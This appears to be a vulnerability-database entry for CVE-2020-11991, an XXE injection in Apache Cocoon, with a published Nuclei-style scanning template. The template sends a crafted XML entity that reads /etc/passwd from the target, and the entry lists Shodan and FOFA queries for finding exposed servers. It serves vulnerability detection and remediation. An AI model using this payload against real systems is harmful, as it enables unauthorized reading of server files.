CVE-2020-11991: Apache Cocoon 2.1.12 - XML Injection

日期: 2025-08-01 | 影响软件: Apache Cocoon | POC: 已公开

漏洞描述

Apache Cocoon 2.1.12 is susceptible to XML injection. When using the StreamGenerator, the code parses a user-provided XML. A specially crafted XML, including external system entities, can be used to access any file on the server system.

PoC代码[已公开]

id: CVE-2020-11991

info:
  name: Apache Cocoon 2.1.12 - XML Injection
  author: pikpikcu
  severity: high
  description: Apache Cocoon 2.1.12 is susceptible to  XML injection. When using the StreamGenerator, the code parses a user-provided XML. A specially crafted XML, including external system entities, can be used to access any file on the server system.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and remote code execution.
  remediation: Upgrade to Apache Cocoon 2.1.13 or later.
  reference:
    - https://lists.apache.org/thread/6xg5j4knfczwdhggo3t95owqzol37k1b
    - https://nvd.nist.gov/vuln/detail/CVE-2020-11991
    - https://lists.apache.org/thread.html/r77add973ea521185e1a90aca00ba9dae7caa8d8b944d92421702bb54%40%3Cusers.cocoon.apache.org%3E
    - https://github.com/ARPSyndicate/cvemon
    - https://github.com/H4ckTh3W0r1d/Goby_POC
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2020-11991
    cwe-id: CWE-611
    epss-score: 0.92403
    epss-percentile: 0.99721
    cpe: cpe:2.3:a:apache:cocoon:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: apache
    product: cocoon
    shodan-query:
      - http.html:"Apache Cocoon"
      - http.html:"apache cocoon"
    fofa-query: body="apache cocoon"
  tags: cve,cve2020,apache,xml,cocoon,xxe

http:
  - method: POST
    path:
      - "{{BaseURL}}/v2/api/product/manger/getInfo"

    body: |
      <!--?xml version="1.0" ?-->
      <!DOCTYPE replace [<!ENTITY ent SYSTEM "file:///etc/passwd"> ]>
      <userInfo>
      <firstName>John</firstName>
      <lastName>&ent;</lastName>
      </userInfo>

    headers:
      Content-Type: "text/xml"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100a0f1b35affa65893d1ead74f102ab6b305dbc0fe070048988e80d7b860e08d370220475d18b9eb3a7a6f97fba1007ad1a766730824e69158abe2cc18c513d4c35f2f:922c64590222798bb761d5b6d8e72950

相关漏洞推荐